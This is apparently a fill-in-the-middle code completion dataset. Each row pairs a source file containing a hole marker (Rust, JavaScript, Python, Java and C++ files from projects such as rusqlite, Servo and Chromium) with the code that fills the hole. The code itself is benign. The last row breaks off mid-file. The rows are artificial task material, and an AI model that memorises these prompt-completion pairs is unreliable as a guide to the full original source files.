prompt
large_stringlengths 70
991k
| completion
large_stringlengths 0
1.02k
|
---|---|
<|file_name|>row.rs<|end_file_name|><|fim▁begin|>use fallible_iterator::FallibleIterator;
use fallible_streaming_iterator::FallibleStreamingIterator;
use std::convert;
use super::{Error, Result, Statement};
use crate::types::{FromSql, FromSqlError, ValueRef};
/// An handle for the resulting rows of a query.
#[must_use = "Rows is lazy and will do nothing unless consumed"]
pub struct Rows<'stmt> {
pub(crate) stmt: Option<&'stmt Statement<'stmt>>,
row: Option<Row<'stmt>>,
}
impl<'stmt> Rows<'stmt> {
#[inline]
fn reset(&mut self) {
if let Some(stmt) = self.stmt.take() {
stmt.reset();
}
}
/// Attempt to get the next row from the query. Returns `Ok(Some(Row))` if
/// there is another row, `Err(...)` if there was an error
/// getting the next row, and `Ok(None)` if all rows have been retrieved.
///
/// ## Note
///
/// This interface is not compatible with Rust's `Iterator` trait, because
/// the lifetime of the returned row is tied to the lifetime of `self`.
/// This is a fallible "streaming iterator". For a more natural interface,
/// consider using [`query_map`](crate::Statement::query_map) or [`query_and_then`](crate::Statement::query_and_then) instead, which
/// return types that implement `Iterator`.
#[allow(clippy::should_implement_trait)] // cannot implement Iterator
#[inline]
pub fn next(&mut self) -> Result<Option<&Row<'stmt>>> {
self.advance()?;
Ok((*self).get())
}
/// Map over this `Rows`, converting it to a [`Map`], which
/// implements `FallibleIterator`.
/// ```rust,no_run
/// use fallible_iterator::FallibleIterator;
/// # use rusqlite::{Result, Statement};
/// fn query(stmt: &mut Statement) -> Result<Vec<i64>> {
/// let rows = stmt.query([])?;
/// rows.map(|r| r.get(0)).collect()
/// }
/// ```
// FIXME Hide FallibleStreamingIterator::map
#[inline]
pub fn map<F, B>(self, f: F) -> Map<'stmt, F>
where
F: FnMut(&Row<'_>) -> Result<B>,
{
Map { rows: self, f }
}
/// Map over this `Rows`, converting it to a [`MappedRows`], which
/// implements `Iterator`.
#[inline]
pub fn mapped<F, B>(self, f: F) -> MappedRows<'stmt, F>
where
F: FnMut(&Row<'_>) -> Result<B>,
{
MappedRows { rows: self, map: f }
}
/// Map over this `Rows` with a fallible function, converting it to a
/// [`AndThenRows`], which implements `Iterator` (instead of
/// `FallibleStreamingIterator`).
#[inline]
pub fn and_then<F, T, E>(self, f: F) -> AndThenRows<'stmt, F>
where
F: FnMut(&Row<'_>) -> Result<T, E>,
{
AndThenRows { rows: self, map: f }
}
}
impl<'stmt> Rows<'stmt> {
#[inline]
pub(crate) fn new(stmt: &'stmt Statement<'stmt>) -> Rows<'stmt> {
Rows {
stmt: Some(stmt),
row: None,
}
}
#[inline]
pub(crate) fn get_expected_row(&mut self) -> Result<&Row<'stmt>> {
match self.next()? {
Some(row) => Ok(row),
None => Err(Error::QueryReturnedNoRows),
}
}
}
impl Drop for Rows<'_> {
#[inline]
fn drop(&mut self) {
self.reset();
}
}
/// `F` is used to tranform the _streaming_ iterator into a _fallible_ iterator.
#[must_use = "iterators are lazy and do nothing unless consumed"]
pub struct Map<'stmt, F> {
rows: Rows<'stmt>,
f: F,
}
impl<F, B> FallibleIterator for Map<'_, F>
where
F: FnMut(&Row<'_>) -> Result<B>,
{
type Error = Error;
type Item = B;
#[inline]
fn next(&mut self) -> Result<Option<B>> {
match self.rows.next()? {
Some(v) => Ok(Some((self.f)(v)?)),
None => Ok(None),
}
}
}
/// An iterator over the mapped resulting rows of a query.
///
/// `F` is used to tranform the _streaming_ iterator into a _standard_ iterator.
#[must_use = "iterators are lazy and do nothing unless consumed"]
pub struct MappedRows<'stmt, F> {
rows: Rows<'stmt>,
map: F,
}
impl<T, F> Iterator for MappedRows<'_, F>
where
F: FnMut(&Row<'_>) -> Result<T>,
{
type Item = Result<T>;
#[inline]
fn next(&mut self) -> Option<Result<T>> {
let map = &mut self.map;
self.rows
.next()
.transpose()
.map(|row_result| row_result.and_then(|row| (map)(&row)))
}
}
/// An iterator over the mapped resulting rows of a query, with an Error type
/// unifying with Error.
#[must_use = "iterators are lazy and do nothing unless consumed"]
pub struct AndThenRows<'stmt, F> {
rows: Rows<'stmt>,
map: F,
}
impl<T, E, F> Iterator for AndThenRows<'_, F>
where
E: convert::From<Error>,
F: FnMut(&Row<'_>) -> Result<T, E>,
{
type Item = Result<T, E>;
#[inline]
fn next(&mut self) -> Option<Self::Item> {
let map = &mut self.map;
self.rows
.next()
.transpose()
.map(|row_result| row_result.map_err(E::from).and_then(|row| (map)(&row)))
}
}
/// `FallibleStreamingIterator` differs from the standard library's `Iterator`
/// in two ways:
/// * each call to `next` (sqlite3_step) can fail.
/// * returned `Row` is valid until `next` is called again or `Statement` is
/// reset or finalized.
///
/// While these iterators cannot be used with Rust `for` loops, `while let`
/// loops offer a similar level of ergonomics:
/// ```rust,no_run
/// # use rusqlite::{Result, Statement};
/// fn query(stmt: &mut Statement) -> Result<()> {
/// let mut rows = stmt.query([])?;
/// while let Some(row) = rows.next()? {
/// // scan columns value
/// }
/// Ok(())
/// }
/// ```
impl<'stmt> FallibleStreamingIterator for Rows<'stmt> {
type Error = Error;
type Item = Row<'stmt>;
#[inline]
fn advance(&mut self) -> Result<()> {
match self.stmt {
Some(ref stmt) => match stmt.step() {
Ok(true) => {
self.row = Some(Row { stmt });
Ok(())
}
Ok(false) => {
self.reset();
self.row = None;
Ok(())
}
Err(e) => {
self.reset();
self.row = None;
Err(e)
}
},
None => {
self.row = None;
Ok(())
}
}
}
#[inline]
fn get(&self) -> Option<&Row<'stmt>> {
self.row.as_ref()
}
}
/// A single result row of a query.
pub struct Row<'stmt> {
pub(crate) stmt: &'stmt Statement<'stmt>,
}
impl<'stmt> Row<'stmt> {
/// Get the value of a particular column of the result row.
///
/// ## Failure
///
/// Panics if calling [`row.get(idx)`](Row::get) would return an error,
/// including:
///
/// * If the underlying SQLite column type is not a valid type as a source
/// for `T`
/// * If the underlying SQLite integral value is outside the range
/// representable by `T`
/// * If `idx` is outside the range of columns in the returned query
pub fn get_unwrap<I: RowIndex, T: FromSql>(&self, idx: I) -> T {
self.get(idx).unwrap()
}
/// Get the value of a particular column of the result row.
///
/// ## Failure
///
/// Returns an `Error::InvalidColumnType` if the underlying SQLite column
/// type is not a valid type as a source for `T`.
///
/// Returns an `Error::InvalidColumnIndex` if `idx` is outside the valid
/// column range for this row.
///
/// Returns an `Error::InvalidColumnName` if `idx` is not a valid column
/// name for this row.
///
/// If the result type is i128 (which requires the `i128_blob` feature to be
/// enabled), and the underlying SQLite column is a blob whose size is not
/// 16 bytes, `Error::InvalidColumnType` will also be returned.
pub fn get<I: RowIndex, T: FromSql>(&self, idx: I) -> Result<T> {
let idx = idx.idx(self.stmt)?;
let value = self.stmt.value_ref(idx);
FromSql::column_result(value).map_err(|err| match err {
FromSqlError::InvalidType => Error::InvalidColumnType(
idx,
self.stmt.column_name_unwrap(idx).into(),
value.data_type(),
),
FromSqlError::OutOfRange(i) => Error::IntegralValueOutOfRange(idx, i),
FromSqlError::Other(err) => {
Error::FromSqlConversionFailure(idx as usize, value.data_type(), err)
}
#[cfg(feature = "i128_blob")]
FromSqlError::InvalidI128Size(_) => Error::InvalidColumnType(
idx,
self.stmt.column_name_unwrap(idx).into(),
value.data_type(),
),
#[cfg(feature = "uuid")]
FromSqlError::InvalidUuidSize(_) => Error::InvalidColumnType(
idx,
self.stmt.column_name_unwrap(idx).into(),
value.data_type(),
),
})
}
/// Get the value of a particular column of the result row as a `ValueRef`,
/// allowing data to be read out of a row without copying.
///
/// This `ValueRef` is valid only as long as this Row, which is enforced by
/// it's lifetime. This means that while this method is completely safe,
/// it can be somewhat difficult to use, and most callers will be better
/// served by [`get`](Row::get) or [`get_unwrap`](Row::get_unwrap).
///
/// ## Failure
///
/// Returns an `Error::InvalidColumnIndex` if `idx` is outside the valid
/// column range for this row.
///
/// Returns an `Error::InvalidColumnName` if `idx` is not a valid column
/// name for this row.
pub fn get_ref<I: RowIndex>(&self, idx: I) -> Result<ValueRef<'_>> {
let idx = idx.idx(self.stmt)?;
// Narrowing from `ValueRef<'stmt>` (which `self.stmt.value_ref(idx)`
// returns) to `ValueRef<'a>` is needed because it's only valid until
// the next call to sqlite3_step.
let val_ref = self.stmt.value_ref(idx);
Ok(val_ref)
}
/// Get the value of a particular column of the result row as a `ValueRef`,
/// allowing data to be read out of a row without copying.
///
/// This `ValueRef` is valid only as long as this Row, which is enforced by
/// it's lifetime. This means that while this method is completely safe,
/// it can be difficult to use, and most callers will be better served by
/// [`get`](Row::get) or [`get_unwrap`](Row::get_unwrap).
///
/// ## Failure
///
/// Panics if calling [`row.get_ref(idx)`](Row::get_ref) would return an error,
/// including:
///
/// * If `idx` is outside the range of columns in the returned query.
/// * If `idx` is not a valid column name for this row.
pub fn get_ref_unwrap<I: RowIndex>(&self, idx: I) -> ValueRef<'_> {
self.get_ref(idx).unwrap()
}
/// Renamed to [`get_ref`](Row::get_ref).
#[deprecated = "Use [`get_ref`](Row::get_ref) instead."]
#[inline]
pub fn get_raw_checked<I: RowIndex>(&self, idx: I) -> Result<ValueRef<'_>> {
self.get_ref(idx)
}
/// Renamed to [`get_ref_unwrap`](Row::get_ref_unwrap).
#[deprecated = "Use [`get_ref_unwrap`](Row::get_ref_unwrap) instead."]
#[inline]
pub fn get_raw<I: RowIndex>(&self, idx: I) -> ValueRef<'_> {
self.get_ref_unwrap(idx)
}
}
mod sealed {
/// This trait exists just to ensure that the only impls of `trait Params`
/// that are allowed are ones in this crate.
pub trait Sealed {}
impl Sealed for usize {}
impl Sealed for &str {}
}
/// A trait implemented by types that can index into columns of a row.
///
/// It is only implemented for `usize` and `&str`.
pub trait RowIndex: sealed::Sealed {
/// Returns the index of the appropriate column, or `None` if no such
/// column exists.
fn idx(&self, stmt: &Statement<'_>) -> Result<usize>;
}
impl RowIndex for usize {
#[inline]
fn idx(&self, stmt: &Statement<'_>) -> Result<usize> {
if *self >= stmt.column_count() {
Err(Error::InvalidColumnIndex(*self))
} else {
Ok(*self)
}
}
}
impl RowIndex for &'_ str {
#[inline]
fn idx(&self, stmt: &Statement<'_>) -> Result<usize> {
stmt.column_index(*self)
}
}
macro_rules! tuple_try_from_row {
($($field:ident),*) => {
impl<'a, $($field,)*> convert::TryFrom<&'a Row<'a>> for ($($field,)*) where $($field: FromSql,)* {
type Error = crate::Error;
// we end with index += 1, which rustc warns about
// unused_variables and unused_mut are allowed for ()
#[allow(unused_assignments, unused_variables, unused_mut)]
fn try_from(row: &'a Row<'a>) -> Result<Self> {
let mut index = 0;
$(
#[allow(non_snake_case)]
let $field = row.get::<_, $field>(index)?;
index += 1;
)*
Ok(($($field,)*))
}
}
}
}
macro_rules! tuples_try_from_row {
() => {
// not very useful, but maybe some other macro users will find this helpful
tuple_try_from_row!();
};
($first:ident $(, $remaining:ident)*) => {
tuple_try_from_row!($first $(, $remaining)*);
tuples_try_from_row!($($remaining),*);
};
}
tuples_try_from_row!(A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P);
#[cfg(test)]
mod tests {
#![allow(clippy::redundant_closure)] // false positives due to lifetime issues; clippy issue #5594
use crate::{Connection, Result};
#[test]
fn test_try_from_row_for_tuple_1() -> Result<()> {
use crate::ToSql;
use std::convert::TryFrom;
let conn = Connection::open_in_memory()?;
conn.execute(
"CREATE TABLE test (a INTEGER)",
crate::params_from_iter(std::iter::empty::<&dyn ToSql>()),
)?;
conn.execute("INSERT INTO test VALUES (42)", [])?;
let val = conn.query_row("SELECT a FROM test", [], |row| <(u32,)>::try_from(row))?;
assert_eq!(val, (42,));
let fail = conn.query_row("SELECT a FROM test", [], |row| <(u32, u32)>::try_from(row));
assert!(fail.is_err());
Ok(())
}
#[test]
fn test_try_from_row_for_tuple_2() -> Result<()> {
use std::convert::TryFrom;
let conn = Connection::open_in_memory()?;
conn.execute("CREATE TABLE test (a INTEGER, b INTEGER)", [])?;
conn.execute("INSERT INTO test VALUES (42, 47)", [])?;
let val = conn.query_row("SELECT a, b FROM test", [], |row| {
<(u32, u32)>::try_from(row)
})?;
assert_eq!(val, (42, 47));
let fail = conn.query_row("SELECT a, b FROM test", [], |row| {
<(u32, u32, u32)>::try_from(row)
});
assert!(fail.is_err());
Ok(())
}
#[test]
fn test_try_from_row_for_tuple_16() -> Result<()> {
use std::convert::TryFrom;
let create_table = "CREATE TABLE test (
a INTEGER,
b INTEGER,
c INTEGER,
d INTEGER,
e INTEGER,
f INTEGER,
g INTEGER,
h INTEGER,
i INTEGER,
j INTEGER,
k INTEGER,
l INTEGER,
m INTEGER,
n INTEGER,
o INTEGER,
p INTEGER
)";
let insert_values = "INSERT INTO test VALUES (
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,<|fim▁hole|> 14,
15
)";
type BigTuple = (
u32,
u32,
u32,
u32,
u32,
u32,
u32,
u32,
u32,
u32,
u32,
u32,
u32,
u32,
u32,
u32,
);
let conn = Connection::open_in_memory()?;
conn.execute(create_table, [])?;
conn.execute(insert_values, [])?;
let val = conn.query_row("SELECT * FROM test", [], |row| BigTuple::try_from(row))?;
// Debug is not implemented for tuples of 16
assert_eq!(val.0, 0);
assert_eq!(val.1, 1);
assert_eq!(val.2, 2);
assert_eq!(val.3, 3);
assert_eq!(val.4, 4);
assert_eq!(val.5, 5);
assert_eq!(val.6, 6);
assert_eq!(val.7, 7);
assert_eq!(val.8, 8);
assert_eq!(val.9, 9);
assert_eq!(val.10, 10);
assert_eq!(val.11, 11);
assert_eq!(val.12, 12);
assert_eq!(val.13, 13);
assert_eq!(val.14, 14);
assert_eq!(val.15, 15);
// We don't test one bigger because it's unimplemented
Ok(())
}
}<|fim▁end|>
|
10,
11,
12,
13,
|
<|file_name|>classes_5.js<|end_file_name|><|fim▁begin|><|fim▁hole|>];<|fim▁end|>
|
var searchData=
[
['rgb',['Rgb',['../structarctic_1_1_rgb.html',1,'arctic']]],
['rgba',['Rgba',['../structarctic_1_1easy_1_1_rgba.html',1,'arctic::easy']]]
|
<|file_name|>blob_url_store.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at https://mozilla.org/MPL/2.0/. */<|fim▁hole|>use std::str::FromStr;
use url::Url;
use uuid::Uuid;
/// Errors returned to Blob URL Store request
#[derive(Clone, Debug, Deserialize, PartialEq, Serialize)]
pub enum BlobURLStoreError {
/// Invalid File UUID
InvalidFileID,
/// Invalid URL origin
InvalidOrigin,
/// Invalid entry content
InvalidEntry,
/// Invalid range
InvalidRange,
/// External error, from like file system, I/O etc.
External(String),
}
/// Standalone blob buffer object
#[derive(Clone, Debug, Deserialize, Serialize)]
pub struct BlobBuf {
pub filename: Option<String>,
/// MIME type string
pub type_string: String,
/// Size of content in bytes
pub size: u64,
/// Content of blob
pub bytes: Vec<u8>,
}
/// Parse URL as Blob URL scheme's definition
///
/// <https://w3c.github.io/FileAPI/#DefinitionOfScheme>
pub fn parse_blob_url(url: &ServoUrl) -> Result<(Uuid, FileOrigin), ()> {
let url_inner = Url::parse(url.path()).map_err(|_| ())?;
let segs = url_inner
.path_segments()
.map(|c| c.collect::<Vec<_>>())
.ok_or(())?;
if url.query().is_some() || segs.len() > 1 {
return Err(());
}
let id = {
let id = segs.first().ok_or(())?;
Uuid::from_str(id).map_err(|_| ())?
};
Ok((id, get_blob_origin(&ServoUrl::from_url(url_inner))))
}
/// Given an URL, returning the Origin that a Blob created under this
/// URL should have.
///
/// HACK(izgzhen): Not well-specified on spec, and it is a bit a hack
/// both due to ambiguity of spec and that we have to serialization the
/// Origin here.
pub fn get_blob_origin(url: &ServoUrl) -> FileOrigin {
if url.scheme() == "file" {
// NOTE: by default this is "null" (Opaque), which is not ideal
"file://".to_string()
} else {
url.origin().ascii_serialization()
}
}<|fim▁end|>
|
use crate::filemanager_thread::FileOrigin;
use servo_url::ServoUrl;
|
<|file_name|>equalcolumnheight.js<|end_file_name|><|fim▁begin|>/*
* equalcolumnheight
* https://github.com/mortennajbjerg/jquery.equalcolumnheight
*
* Copyright (c) 2013 Morten Najbjerg
* Licensed under the GPLv3 license.
*/
(function($) {
$.fn.equalcolumnheight = function() {
var $this = $(this),
heighest = 0;<|fim▁hole|> // Calculate the heighest element and return integer
var getHeighestValue = function() {
var heights = getElementsHeight();
return Math.max.apply($this, heights );
};
// Return array of all element heights
var getElementsHeight = function() {
return $.map( $this , function(e){ return $(e).outerHeight(); });
};
// Set a height on all elements
var setElementsHeight = function(value) {
$this.css('height', value);
};
var init = function() {
setElementsHeight('auto');
heighest = getHeighestValue();
setElementsHeight(heighest);
};
// Set resize
$( window ).resize(function() {
init();
});
// Make sure that this works even
// if the columns has images inside them
$( window ).load(function() {
init();
});
init();
};
}(jQuery));<|fim▁end|>
| |
<|file_name|>assert_.py<|end_file_name|><|fim▁begin|>from functions.str import w_str
from wtypes.control import WEvalRequired, WRaisedException, WReturnValue
from wtypes.exception import WException
from wtypes.magic_macro import WMagicMacro
from wtypes.boolean import WBoolean
class WAssert(WMagicMacro):
def call_magic_macro(self, exprs, scope):
if len(exprs) != 1:
raise Exception(
"Macro assert expected 1 argument. "
"Got {} instead.".format(len(exprs)))
expr = exprs[0]
src = w_str(expr)
def callback(_value):
if _value is WBoolean.false:
return WRaisedException(
exception=WException(f'Assertion failed: {src}'))
return WReturnValue(expr=_value)
<|fim▁hole|><|fim▁end|>
|
return WEvalRequired(expr=expr, callback=callback)
|
<|file_name|>0001_initial.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Stat',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),<|fim▁hole|> ],
options={
},
bases=(models.Model,),
),
]<|fim▁end|>
|
('date', models.DateTimeField(auto_now_add=True)),
('up', models.BigIntegerField()),
('down', models.BigIntegerField()),
('live_time', models.BigIntegerField()),
|
<|file_name|>testem.js<|end_file_name|><|fim▁begin|>module.exports = {
framework: 'qunit',
test_page: 'tests/index.html?hidepassed',
disable_watching: true,
launch_in_ci: [
'Chrome'
],
launch_in_dev: [
'Chrome'
],
browser_args: {
Chrome: {
mode: 'ci',
args: [
// --no-sandbox is needed when running Chrome inside a container
process.env.TRAVIS ? '--no-sandbox' : null,
'--disable-gpu',<|fim▁hole|> ].filter(Boolean)
}
}
};<|fim▁end|>
|
'--headless',
'--no-sandbox',
'--remote-debugging-port=9222',
'--window-size=1440,900'
|
<|file_name|>index.js<|end_file_name|><|fim▁begin|>/*jslint node: true */
'use strict';
var _ = require('underscore.string'),<|fim▁hole|> path = require('path'),
chalk = require('chalk-log');
module.exports = function() {
return function (done) {
var prompts = [{
name: 'taglibName',
message: 'What is the name of your taglib or taglibs (, separated) ?',
}, {
name: 'appName',
message: 'For which app (empty: global) ?'
}, {
type: 'confirm',
name: 'moveon',
message: 'Continue?'
}];
//Ask
inquirer.prompt(prompts,
function (answers) {
if (!answers.moveon) {
return done();
}
if (_.isBlank(answers.taglibName)) {
chalk.error('Taglib name can NOT be empty');
done();
}
answers.taglibName = _.clean(answers.taglibName);
var appPath = path.join('./apps', answers.appName);
var targetDir = _.isBlank(answers.appName) ? './apps/_global' : appPath;
var createTagLib = require('./create-taglib');
if (answers.taglibName.match(/,/)) {
var taglibs = answers.taglibName.split(',').map(function(taglib) {
return _.clean(taglib);
});
for (let taglib of taglibs) {
answers = {taglibName: taglib, appName: answers.appName};
createTagLib(answers, targetDir);
}
} else {
createTagLib(answers, targetDir);
}
}
);
};
};<|fim▁end|>
|
inquirer = require('inquirer'),
|
<|file_name|>TwaSplashController.java<|end_file_name|><|fim▁begin|>// Copyright 2019 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package org.chromium.chrome.browser.browserservices.ui.splashscreen.trustedwebactivity;
import static android.view.ViewGroup.LayoutParams.MATCH_PARENT;
import static androidx.browser.trusted.TrustedWebActivityIntentBuilder.EXTRA_SPLASH_SCREEN_PARAMS;
import android.app.Activity;
import android.content.Intent;
import android.graphics.Bitmap;
import android.graphics.Color;
import android.graphics.Matrix;
import android.os.Bundle;
import android.view.View;
import android.view.ViewGroup;
import android.widget.ImageView;
import androidx.browser.customtabs.TrustedWebUtils;
import androidx.browser.trusted.TrustedWebActivityIntentBuilder;
import androidx.browser.trusted.splashscreens.SplashScreenParamKey;
import org.chromium.base.IntentUtils;
import org.chromium.chrome.browser.browserservices.intents.BrowserServicesIntentDataProvider;
import org.chromium.chrome.browser.browserservices.ui.splashscreen.SplashController;
import org.chromium.chrome.browser.browserservices.ui.splashscreen.SplashDelegate;
import org.chromium.chrome.browser.customtabs.TranslucentCustomTabActivity;
import org.chromium.chrome.browser.tab.Tab;
import org.chromium.ui.base.ActivityWindowAndroid;
import org.chromium.ui.util.ColorUtils;
import javax.inject.Inject;
/**
* Orchestrates the flow of showing and removing splash screens for apps based on Trusted Web
* Activities.
*
* The flow is as follows:
* - TWA client app verifies conditions for showing splash screen. If the checks pass, it shows the
* splash screen immediately.
* - The client passes the URI to a file with the splash image to
* {@link androidx.browser.customtabs.CustomTabsService}. The image is decoded and put into
* {@link SplashImageHolder}.
* - The client then launches a TWA, at which point the Bitmap is already available.
* - ChromeLauncherActivity calls {@link #handleIntent}, which starts
* {@link TranslucentCustomTabActivity} - a CustomTabActivity with translucent style. The
* translucency is necessary in order to avoid a flash that might be seen when starting the activity
* before the splash screen is attached.
* - {@link TranslucentCustomTabActivity} creates an instance of {@link TwaSplashController} which
* immediately displays the splash screen in an ImageView on top of the rest of view hierarchy.
* - It also immediately removes the translucency. See comment in {@link SplashController} for more
* details.
* - It waits for the page to load, and removes the splash image once first paint (or a failure)
* occurs.
*
* Lifecycle: this class is resolved only once when CustomTabActivity is launched, and is
* gc-ed when it finishes its job.
* If these lifecycle assumptions change, consider whether @ActivityScope needs to be added.
*/
public class TwaSplashController implements SplashDelegate {
// TODO(pshmakov): move this to AndroidX.
private static final String KEY_SHOWN_IN_CLIENT =
"androidx.browser.trusted.KEY_SPLASH_SCREEN_SHOWN_IN_CLIENT";
private final SplashController mSplashController;
private final Activity mActivity;
private final SplashImageHolder mSplashImageCache;
private final BrowserServicesIntentDataProvider mIntentDataProvider;
@Inject
public TwaSplashController(SplashController splashController, Activity activity,
ActivityWindowAndroid activityWindowAndroid, SplashImageHolder splashImageCache,
BrowserServicesIntentDataProvider intentDataProvider) {
mSplashController = splashController;
mActivity = activity;
mSplashImageCache = splashImageCache;
mIntentDataProvider = intentDataProvider;
long splashHideAnimationDurationMs =
IntentUtils.safeGetInt(getSplashScreenParamsFromIntent(),
SplashScreenParamKey.KEY_FADE_OUT_DURATION_MS, 0);
mSplashController.setConfig(this, splashHideAnimationDurationMs);
}
@Override
public View buildSplashView() {
Bitmap bitmap = mSplashImageCache.takeImage(mIntentDataProvider.getSession());
if (bitmap == null) {
return null;
}
ImageView splashView = new ImageView(mActivity);
splashView.setLayoutParams(new ViewGroup.LayoutParams(MATCH_PARENT, MATCH_PARENT));
splashView.setImageBitmap(bitmap);
applyCustomizationsToSplashScreenView(splashView);
return splashView;
}
@Override
public void onSplashHidden(Tab tab, long startTimestamp, long endTimestamp) {}
@Override
public boolean shouldWaitForSubsequentPageLoadToHideSplash() {
return false;
}
private void applyCustomizationsToSplashScreenView(ImageView imageView) {
Bundle params = getSplashScreenParamsFromIntent();
int backgroundColor = IntentUtils.safeGetInt(
params, SplashScreenParamKey.KEY_BACKGROUND_COLOR, Color.WHITE);
imageView.setBackgroundColor(ColorUtils.getOpaqueColor(backgroundColor));
int scaleTypeOrdinal =
IntentUtils.safeGetInt(params, SplashScreenParamKey.KEY_SCALE_TYPE, -1);
ImageView.ScaleType[] scaleTypes = ImageView.ScaleType.values();
ImageView.ScaleType scaleType;
if (scaleTypeOrdinal < 0 || scaleTypeOrdinal >= scaleTypes.length) {
scaleType = ImageView.ScaleType.CENTER;
} else {
scaleType = scaleTypes[scaleTypeOrdinal];
}
imageView.setScaleType(scaleType);
if (scaleType != ImageView.ScaleType.MATRIX) return;
float[] matrixValues = IntentUtils.safeGetFloatArray(
params, SplashScreenParamKey.KEY_IMAGE_TRANSFORMATION_MATRIX);
if (matrixValues == null || matrixValues.length != 9) return;
Matrix matrix = new Matrix();
matrix.setValues(matrixValues);
imageView.setImageMatrix(matrix);
}
private Bundle getSplashScreenParamsFromIntent() {
return mIntentDataProvider.getIntent().getBundleExtra(EXTRA_SPLASH_SCREEN_PARAMS);<|fim▁hole|> * Returns true if the intent corresponds to a TWA with a splash screen.
*/
public static boolean intentIsForTwaWithSplashScreen(Intent intent) {
boolean isTrustedWebActivity = IntentUtils.safeGetBooleanExtra(
intent, TrustedWebUtils.EXTRA_LAUNCH_AS_TRUSTED_WEB_ACTIVITY, false);
boolean requestsSplashScreen =
IntentUtils.safeGetParcelableExtra(intent, EXTRA_SPLASH_SCREEN_PARAMS) != null;
return isTrustedWebActivity && requestsSplashScreen;
}
/**
* Handles the intent if it should launch a TWA with splash screen.
* @param activity Activity, from which to start the next one.
* @param intent Incoming intent.
* @return Whether the intent was handled.
*/
public static boolean handleIntent(Activity activity, Intent intent) {
if (!intentIsForTwaWithSplashScreen(intent)) return false;
Bundle params = IntentUtils.safeGetBundleExtra(
intent, TrustedWebActivityIntentBuilder.EXTRA_SPLASH_SCREEN_PARAMS);
boolean shownInClient = IntentUtils.safeGetBoolean(params, KEY_SHOWN_IN_CLIENT, true);
// shownInClient is "true" by default for the following reasons:
// - For compatibility with older clients which don't use this bundle key.
// - Because getting "false" when it should be "true" leads to more severe visual glitches,
// than vice versa.
if (shownInClient) {
// If splash screen was shown in client, we must launch a translucent activity to
// ensure smooth transition.
intent.setClassName(activity, TranslucentCustomTabActivity.class.getName());
}
intent.addFlags(Intent.FLAG_ACTIVITY_NO_ANIMATION);
activity.startActivity(intent);
activity.overridePendingTransition(0, 0);
return true;
}
}<|fim▁end|>
|
}
/**
|
<|file_name|>overlay_scroll_bar.cc<|end_file_name|><|fim▁begin|>// Copyright 2013 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "ui/views/controls/scrollbar/overlay_scroll_bar.h"
#include <memory>
#include "base/bind.h"
#include "base/i18n/rtl.h"<|fim▁hole|>#include "third_party/skia/include/core/SkColor.h"
#include "ui/base/metadata/metadata_impl_macros.h"
#include "ui/color/color_id.h"
#include "ui/color/color_provider.h"
#include "ui/compositor/layer.h"
#include "ui/compositor/scoped_layer_animation_settings.h"
#include "ui/gfx/canvas.h"
#include "ui/native_theme/overlay_scrollbar_constants_aura.h"
#include "ui/views/background.h"
#include "ui/views/border.h"
#include "ui/views/layout/fill_layout.h"
namespace views {
namespace {
// Total thickness of the thumb (matches visuals when hovered).
constexpr int kThumbThickness =
ui::kOverlayScrollbarThumbWidthPressed + ui::kOverlayScrollbarStrokeWidth;
// When hovered, the thumb takes up the full width. Otherwise, it's a bit
// slimmer.
constexpr int kThumbHoverOffset = 4;
// The layout size of the thumb stroke, in DIP.
constexpr int kThumbStroke = ui::kOverlayScrollbarStrokeWidth;
// The visual size of the thumb stroke, in px.
constexpr int kThumbStrokeVisualSize = ui::kOverlayScrollbarStrokeWidth;
} // namespace
OverlayScrollBar::Thumb::Thumb(OverlayScrollBar* scroll_bar)
: BaseScrollBarThumb(scroll_bar), scroll_bar_(scroll_bar) {
// |scroll_bar| isn't done being constructed; it's not safe to do anything
// that might reference it yet.
}
OverlayScrollBar::Thumb::~Thumb() = default;
void OverlayScrollBar::Thumb::Init() {
SetFlipCanvasOnPaintForRTLUI(true);
SetPaintToLayer();
layer()->SetFillsBoundsOpaquely(false);
// Animate all changes to the layer except the first one.
OnStateChanged();
layer()->SetAnimator(ui::LayerAnimator::CreateImplicitAnimator());
}
gfx::Size OverlayScrollBar::Thumb::CalculatePreferredSize() const {
// The visual size of the thumb is kThumbThickness, but it slides back and
// forth by kThumbHoverOffset. To make event targetting work well, expand the
// width of the thumb such that it's always taking up the full width of the
// track regardless of the offset.
return gfx::Size(kThumbThickness + kThumbHoverOffset,
kThumbThickness + kThumbHoverOffset);
}
void OverlayScrollBar::Thumb::OnPaint(gfx::Canvas* canvas) {
const bool hovered = GetState() != Button::STATE_NORMAL;
cc::PaintFlags fill_flags;
fill_flags.setStyle(cc::PaintFlags::kFill_Style);
fill_flags.setColor(GetColorProvider()->GetColor(
hovered ? ui::kColorOverlayScrollbarFillHovered
: ui::kColorOverlayScrollbarFill));
gfx::RectF fill_bounds(GetLocalBounds());
fill_bounds.Inset(gfx::InsetsF(IsHorizontal() ? kThumbHoverOffset : 0,
IsHorizontal() ? 0 : kThumbHoverOffset, 0, 0));
fill_bounds.Inset(gfx::InsetsF(kThumbStroke, kThumbStroke,
IsHorizontal() ? 0 : kThumbStroke,
IsHorizontal() ? kThumbStroke : 0));
canvas->DrawRect(fill_bounds, fill_flags);
cc::PaintFlags stroke_flags;
stroke_flags.setStyle(cc::PaintFlags::kStroke_Style);
stroke_flags.setColor(GetColorProvider()->GetColor(
hovered ? ui::kColorOverlayScrollbarStrokeHovered
: ui::kColorOverlayScrollbarStroke));
stroke_flags.setStrokeWidth(kThumbStrokeVisualSize);
stroke_flags.setStrokeCap(cc::PaintFlags::kSquare_Cap);
// The stroke is a single pixel, so we must deal with the unscaled canvas.
const float dsf = canvas->UndoDeviceScaleFactor();
gfx::RectF stroke_bounds(fill_bounds);
stroke_bounds.Scale(dsf);
// The stroke should be aligned to the pixel center that is nearest the fill,
// so outset by a half pixel.
stroke_bounds.Inset(gfx::InsetsF(-kThumbStrokeVisualSize / 2.0f));
